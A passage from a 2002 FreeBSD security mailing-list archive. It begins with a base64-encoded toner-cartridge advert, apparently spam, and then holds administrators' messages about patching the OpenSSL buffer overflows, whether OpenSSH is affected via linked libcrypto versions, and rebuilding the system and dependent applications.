CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+JDQ5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2Nl bnRlcj4NCg0KPGNlbnRlcj4NCjxwPjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSI+Jm5ic3A7 PHU+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzI+Rm9yDQpDYW5ub24gQ29waWVy czogKFBhZ2UgMTApPC9mb250PjwvZm9udD48L3U+PC9mb250PjwvY2VudGVyPg0KDQo8cD48YnI+ DQo8Y2VudGVyPjx0YWJsZSBCT1JERVIgV0lEVEg9IjgwJSIgSEVJR0hUPSIxMCUiIEJHQ09MT1I9 IiNGRkZGQ0MiID4NCjx0ciBCR0NPTE9SPSIjNDA4MDgwIj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+SVRFTTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXpl PSsxPkRFU0NSSVBUSU9OPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+TUZHICM8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZG RiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5JdGVtICMgMTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlBDIDYvIDZSRS8gNy8gOC8g MTEvIDEyLyA2NTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0EzMCZuYnNwOzwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIj MDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ2OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K PC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQg c2l6ZT0rMT5JdGVtICMgMjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlBDIDMwMC8zMjAvMzQw LzM2MCZuYnNwOyBBbGwNCjMwMCBTZXJpZXM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJz cDtFNDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRl cj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kODk8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9 IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjMzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx PlBDIDcwMC83MjAvNzYwJm5ic3A7IEFsbCA3MDANClNlcmllczwvZm9udD48L2ZvbnQ+PC9jZW50 ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBz aXplPSsxPiZuYnNwO0U0MCZuYnNwOzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ4OTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICM0PC9mb250PjwvZm9udD48 L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+UEMgOTAwLzkxMC85MjAmbmJzcDsgQWxsIDkwMA0KU2VyaWVzPC9mb250Pjwv Zm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAw OTkiPjxmb250IHNpemU9KzE+Jm5ic3A7RTQwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDg5 PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2NlbnRlcj4N Cg0KPGNlbnRlcj4NCjxwPjx1Pjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzI+Rm9yDQpFcHNvbiBhbmQgUGFuYXNvbmljIFByaW50 ZXJzOihvbiBQYWdlcyA0ICZhbXA7IDcpPC9mb250PjwvZm9udD48L2ZvbnQ+PC91PjwvY2VudGVy Pg0KDQo8cD48YnI+DQo8Y2VudGVyPjx0YWJsZSBCT1JERVIgV0lEVEg9IjgwJSIgSEVJR0hUPSIx MCUiIEJHQ09MT1I9IiNGRkZGQ0MiID4NCjx0ciBCR0NPTE9SPSIjNDA4MDgwIj4NCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+SVRFTTwvZm9udD48L2Zv bnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IHNpemU9KzE+Jm5ic3A7 PGZvbnQgY29sb3I9IiNGRkZGRkYiPkRFU0NSSVBUSU9OPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9 KzE+TUZHICM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMgMTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx PkVwc29uIDEwMDAvMTUwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlMwNTEwMTEmbmJzcDs8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMTA1PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48 Zm9udCBzaXplPSsxPkl0ZW0gIzImbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5FcHNv biBFUEw3MDAwLzgwMDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRk Pg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5TMDUxMjAwJm5i c3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDEwNSZuYnNwOzwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMzPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ UGFuYXNvbmljIDkwLzk1Jm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0 ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+LS0tLS0tLS0t LS0tLS0tLT48L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMTA1PC9mb250PjwvZm9udD48L2Nl bnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2NlbnRlcj4NCg0KPGNlbnRlcj4NCjxwPjx1 Pjxmb250IHNpemU9KzM+U29ycnksPC9mb250PjwvdT48Zm9udCBzaXplPSsyPiZuYnNwOyBTdGls bCBubyBJbmtqZXRzLA0KYnViYmxlIGpldHMgb3IgWGVyb3ggaW4gc3RvY2s8L2ZvbnQ+DQo8YnI+ Jm5ic3A7DQo8YnI+Jm5ic3A7DQo8YnI+Jm5ic3A7DQo8cD48dT48Yj5ESVNDTEFJTUVSUzwvYj46 PC91Pg0KPHA+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7IEFsbCB0cmFkZW1hcmtzLCBicmFuZCBu YW1lcyBhbmQgZGlhZ3JhbXMgbGlzdGVkDQpvciBzaG93biBhYm92ZQ0KPGJyPmFyZSBwcm9wZXJ0 eSBvZiB0aGVpciByZXNwZWN0aXZlIGhvbGRlcnMmbmJzcDsmbmJzcDsgYW5kIHVzZWQgZm9yIGRl c2NyaXB0aXZlDQpwdXJwb3NlcyBvbmx5DQo8YnI+LldlIGRvIG5vdCBjYXJyeSBhbnkgSFAgT0VN Jm5ic3A7IFByb2R1Y3RzLg0KPHA+PGZvbnQgZmFjZT0iQ29taWMgU2FucyBNUyI+PHU+Tk9URVM8 L3U+OjwvZm9udD4NCjxwPlVuaXZlcnNpdHkgYW5kIFNjaG9vbCBQdXJjaGFzZSBvcmRlcnMgd2Vs Y29tZS4gKE5vIENyZWRpdCBhcHByb3ZhbCByZXF1aXJlZC4NCkFsbCBvdGhlciBQdXJjaGFzZQ0K PGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBvcmRlcnMgcmVxdWlyZSBjcmVkaXQgYXBwcm92YWwNCjxi cj4mbmJzcDtQYXkgYnkgY2hlY2sgKEMuTy5ELiksIENyZWRpdCBjYXJkIG9yIHB1cmNoYXNlIG9y ZGVyIChOZXQgMzANCkRheXMpDQo8YnI+U2hpcHBpbmcgY2hhcmdlcyBzdGFydCBhdCAkNC41IHBl ciBjYXJ0cmlkZ2UuIEFkZCAkMS41IGZvciBlYWNoIGFkZGl0aW9uYWwNCmNhcnRyaWRnZS4gQ2Fy dHJpZGdlcw0KPGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBkZWxpdmVyZWQgYnkgRmVkZXJhbCBFeHBy ZXNzIHdpdGhpbiAyIHRvIDUgd29ya2luZw0KZGF5cyBkZXBlbmRpbmcgb24geW91ciBsb2NhdGlv bi4NCjxicj5TaGlwcGluZyBhbmQgYmlsbGluZyBhZGRyZXNzZXMgYXJlIHJlcXVpcmVkIGZvciBQ dXJjaGFzZSBPcmRlciB0cmFuc2FjdGlvbnMuDQpZb3VyIGludm9pY2Ugd2lsbA0KPGJyPiZuYnNw OyZuYnNwOyZuYnNwOyBiZSBhdHRhY2hlZCB0byB5b3VyIHBhY2thZ2luZy4gUGxlYXNlIHBlYWwg YW5kIHBheQ0Kd2l0aGluIDMwIGRheXMuDQo8YnI+MzAgZGF5IHN0YW5kYXJkIHJldHVybiBwb2xp Y3kgKG1vbmV5IGJhY2sgZ3VhcmFudGVlKSBvbiBhbGwgbWVyY2hhbmRpc2UuDQo5MCBkYXkgdW5s aW1pdGVkIGV4Y2hhbmdlIHBvbGljeQ0KPGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBmb3IgZGVmZWN0 aXZlIG1lcmNoYW5kaXNlPGZvbnQgZmFjZT0iQ29taWMgU2FucyBNUyI+LjwvZm9udD4NCjxwPjxi Pjx1PkVYQ0xVU0lPTlM6PC91PjwvYj4NCjxwPjx1PldlIGRvIG5vdCBjYXJyeTo8L3U+DQo8cD4m bmJzcDsmbmJzcDsmbmJzcDsgLSBYZXJveCwgQnJvdGhlciwgUGFuYXNvbmljLCBvciBGdWppdHN1 IFByb2R1Y3RzDQo8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7IC0gRGVza2pldC9JbmtqZXQgb3IgQnVi YmxlamV0IHByb2R1Y3RzDQo8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7IC1BbnkgT2ZmYnJh bmRzIGJlc2lkZXMgdGhlIG9uZXMgbGlzdGVkIGFib3ZlLg0KQWxsIGNhcnRyaWRnZXMNCjxicj4m bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgYXJl IGNvbXBhdGlibGUNCmhpZ2ggeWllbGQgcHJvZHVjDQo8YnI+PGZvbnQgZmFjZT0iQnJ1c2hTY3Jp cHQgQlQiPjxmb250IGNvbG9yPSIjRkY2NjY2Ij48Zm9udCBzaXplPSs0PjwvZm9udD48L2ZvbnQ+ PC9mb250PiZuYnNwOzxmb250IA0KZmFjZT0iQnJ1c2hTY3JpcHQgQlQiPjxmb250IGNvbG9yPSIj RkY2NjY2Ij48Zm9udCBzaXplPSs0PjwvZm9udD48L2ZvbnQ+PC9mb250Pg0KPHA+PGZvbnQgZmFj ZT0iQnJ1c2hTY3JpcHQgQlQiPjxmb250IGNvbG9yPSIjRkY2NjY2Ij48Zm9udCBzaXplPSs0Pkhh dmUNCmEgZ3JlYXQgZGF5ISE8L2ZvbnQ+PC9mb250PjwvZm9udD48L2NlbnRlcj4NCg0KPHA+PGJy Pg0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZu YnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJy PiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0K PGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNw Ow0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZu YnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJy PiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGRsPg0KPGR0Pg0KPC9kdD4NCjwvZGw+ DQoNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4m bmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxi cj4mbmJzcDsNCjwvYm9keT4NCjwvaHRtbD4NCg== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 2:26:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 42DA237B405 for ; Wed, 31 Jul 2002 02:24:16 -0700 (PDT) Received: from ady.warpnet.ro (ady.warpnet.ro [217.156.25.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 74D6C43E70 for ; Wed, 31 Jul 2002 02:24:14 -0700 (PDT) (envelope-from ady@freebsd.ady.ro) Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id MAA59458 for ; Wed, 31 Jul 2002 12:24:12 +0300 (EEST) (envelope-from ady@freebsd.ady.ro) Date: Wed, 31 Jul 2002 12:24:11 +0300 (EEST) From: Adrian Penisoara X-Sender: ady@ady.warpnet.ro To: freebsd-security@freebsd.org Subject: Are OpenSSL bugs related to OpenSSH ? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Though I think that the recent OpenSSL buffer overflows don't imply that OpenSSH is vulnerable, could someone please confirm this ? Thank you, Ady (@freebsd.ady.ro) ____________________________________________________________________ | An age is called Dark not because the light fails to shine, but | | because people refuse to see it. | | -- James Michener, "Space" | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 3:41:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6C93237B400; Wed, 31 Jul 2002 03:41:27 -0700 (PDT) Received: from bunning.skiltech.com (bunning.skiltech.com [216.235.79.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id B7D3643E4A; Wed, 31 Jul 2002 03:41:26 -0700 (PDT) (envelope-from minter@lunenburg.org) Received: (from root@localhost) by bunning.skiltech.com (8.12.3/8.12.3) id g6VAfPar083692; Wed, 31 Jul 2002 06:41:25 -0400 (EDT) (envelope-from minter@lunenburg.org) Received: from dundas.lunenburg.org (rdu162-234-201.nc.rr.com [24.162.234.201]) (authenticated bits=0) by bunning.skiltech.com (8.12.3/8.12.3) with ESMTP id g6VAfK04083675 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Wed, 31 Jul 2002 06:41:22 -0400 (EDT) (envelope-from minter@lunenburg.org) Date: Wed, 31 Jul 2002 06:41:20 -0400 Subject: Re: OpenSSL workaround Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v482) Cc: security@freebsd.org To: "Jacques A. Vidrine" From: "H. Wade Minter" In-Reply-To: <20020731032131.GB38906@madman.nectar.cc> Message-Id: <0CDD655A-A472-11D6-AA2C-003065819B10@lunenburg.org> Content-Transfer-Encoding: 7bit X-Mailer: Apple Mail (2.482) X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday, July 30, 2002, at 11:21 PM, Jacques A. Vidrine wrote: > On Tue, Jul 30, 2002 at 10:13:05PM -0400, H. Wade Minter wrote: >> I saw that openssl got committed to RELENG_4_6 today, but haven't >> seen a >> security announcement go by. What's the recommended way to patch this >> openssl hole? > > You can cvsup to RELENG_4_6. > > I probably won't send out the announcement until I've finished with > RELENG_4_5 and RELENG_4_4, and that won't be tonight. For various > reasons, merging and testing the upgrade is time consuming. I knew I should have been clearer. :-) I cvsup'd to RELENG_4_6, but am curious about the steps to fix the problem after that. There's no standard Makefile in /usr/src/crypto/openssl/ - do I do the normal "make depend install" procedure on Makefile.org or Makefile.ssl instead? --Wade To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 4: 3:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C02E137B400 for ; Wed, 31 Jul 2002 04:03:22 -0700 (PDT) Received: from office.advantage-interactive.com (host217-37-74-237.in-addr.btopenworld.com [217.37.74.237]) by mx1.FreeBSD.org (Postfix) with ESMTP id D4F5E43E31 for ; Wed, 31 Jul 2002 04:03:16 -0700 (PDT) (envelope-from simond@irrelevant.org) Received: from devbox.advantage-interactive.com ([192.168.254.128]) by office.advantage-interactive.com with esmtp (Exim 3.36 #1) id 17ZrFe-00009X-00; Wed, 31 Jul 2002 12:02:46 +0100 Subject: Re: Are OpenSSL bugs related to OpenSSH ? From: Simon Dick To: Adrian Penisoara Cc: freebsd-security@freebsd.org In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Evolution/1.0.2 Date: 31 Jul 2002 12:02:45 +0100 Message-Id: <1028113366.1406.0.camel@linux> Mime-Version: 1.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 2002-07-31 at 10:24, Adrian Penisoara wrote: > Hi, > > Though I think that the recent OpenSSL buffer overflows don't imply > that OpenSSH is vulnerable, could someone please confirm this ? OpenSSH is linked against OpenSSL, so it's a possibility that it could be vulnerable, but unless you have ssh statically linked then updating your openssl version will fix any problems. -- Simon Dick simond@irrelevant.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 4:27:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4575337B400 for ; Wed, 31 Jul 2002 04:27:37 -0700 (PDT) Received: from mail.wsf.at (MAIL.WSF.AT [212.16.37.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2368243E72 for ; Wed, 31 Jul 2002 04:27:36 -0700 (PDT) (envelope-from net@wsf.at) Received: (from root@localhost) by mail.wsf.at (8.11.6/8.9.3) id g6VBRX798842 for freebsd-security@FreeBSD.ORG.KAV; Wed, 31 Jul 2002 13:27:33 +0200 (CEST) (envelope-from net@wsf.at) Received: from wsf.at (localhost [127.0.0.1]) by www.wsf.at (8.11.6/8.9.3) with SMTP id g6VBRWY98818; Wed, 31 Jul 2002 13:27:32 +0200 (CEST) (envelope-from net@wsf.at) Message-Id: <200207311127.g6VBRWY98818@www.wsf.at> Date: Wed, 31 Jul 2002 11:27:32 -0000 To: "Simon Dick" , "Adrian Penisoara" Subject: Re: Are OpenSSL bugs related to OpenSSH ? From: X-Mailer: TWIG 2.6.2 In-Reply-To: <1028113366.1406.0.camel@linux> Cc: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Simon Dick schrieb: > On Wed, 2002-07-31 at 10:24, Adrian Penisoara wrote: > > Hi, > > > > Though I think that the recent OpenSSL buffer overflows don't imply > > that OpenSSH is vulnerable, could someone please confirm this ? > > OpenSSH is linked against OpenSSL, so it's a possibility that it could > be vulnerable, but unless you have ssh statically linked then updating > your openssl version will fix any problems. > Hi Simon, I think this is only true if your version of ssh/sshd was already built with a recent version of OpenSSL (libcrypto.so.3). If your ssh uses libcrypto.so.2, updating OpenSSL to 0.9.6e would still leave your ssh vulnerable (same applies to any other build using OpenSSL) Thomas BTW: which version of OpenSSL bumped so.2 -> so.3 ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 4:28:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9E33C37B400 for ; Wed, 31 Jul 2002 04:28:42 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2897A43E70 for ; Wed, 31 Jul 2002 04:28:42 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id BA3553C; Wed, 31 Jul 2002 06:28:41 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g6VBSfU4026331; Wed, 31 Jul 2002 06:28:41 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g6VBSfeB026330; Wed, 31 Jul 2002 06:28:41 -0500 (CDT) Date: Wed, 31 Jul 2002 06:28:41 -0500 From: "Jacques A. Vidrine" To: "H. Wade Minter" Cc: security@freebsd.org Subject: Re: OpenSSL workaround Message-ID: <20020731112841.GC26274@madman.nectar.cc> References: <20020731032131.GB38906@madman.nectar.cc> <0CDD655A-A472-11D6-AA2C-003065819B10@lunenburg.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <0CDD655A-A472-11D6-AA2C-003065819B10@lunenburg.org> X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jul 31, 2002 at 06:41:20AM -0400, H. Wade Minter wrote: > I knew I should have been clearer. :-) I cvsup'd to RELENG_4_6, but am > curious about the steps to fix the problem after that. There's no > standard Makefile in /usr/src/crypto/openssl/ - do I do the normal "make > depend install" procedure on Makefile.org or Makefile.ssl instead? Oh, sorry, I get you. I recommend that you rebuild the system as descrbied in . Also rebuild third-party applications that use OpenSSL (either libssl or libcrypto). Any applications that are rebuilt must also be restarted. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 4:55:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BD1AB37B400 for ; Wed, 31 Jul 2002 04:55:30 -0700 (PDT) Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id AE6A643E6A for ; Wed, 31 Jul 2002 04:55:29 -0700 (PDT) (envelope-from mike@sentex.net) Received: from house.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.12.5/8.12.3) with ESMTP id g6VBtQ1A015956; Wed, 31 Jul 2002 07:55:27 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020731075521.04b14d70@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 31 Jul 2002 07:57:30 -0400 To: Sune Stjerneby From: Mike Tancsa Subject: Re: apache mod_ssl ? Cc: security@freebsd.org In-Reply-To: <20020731085657.GA33775@fnyx.vmunix.dk> References: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: 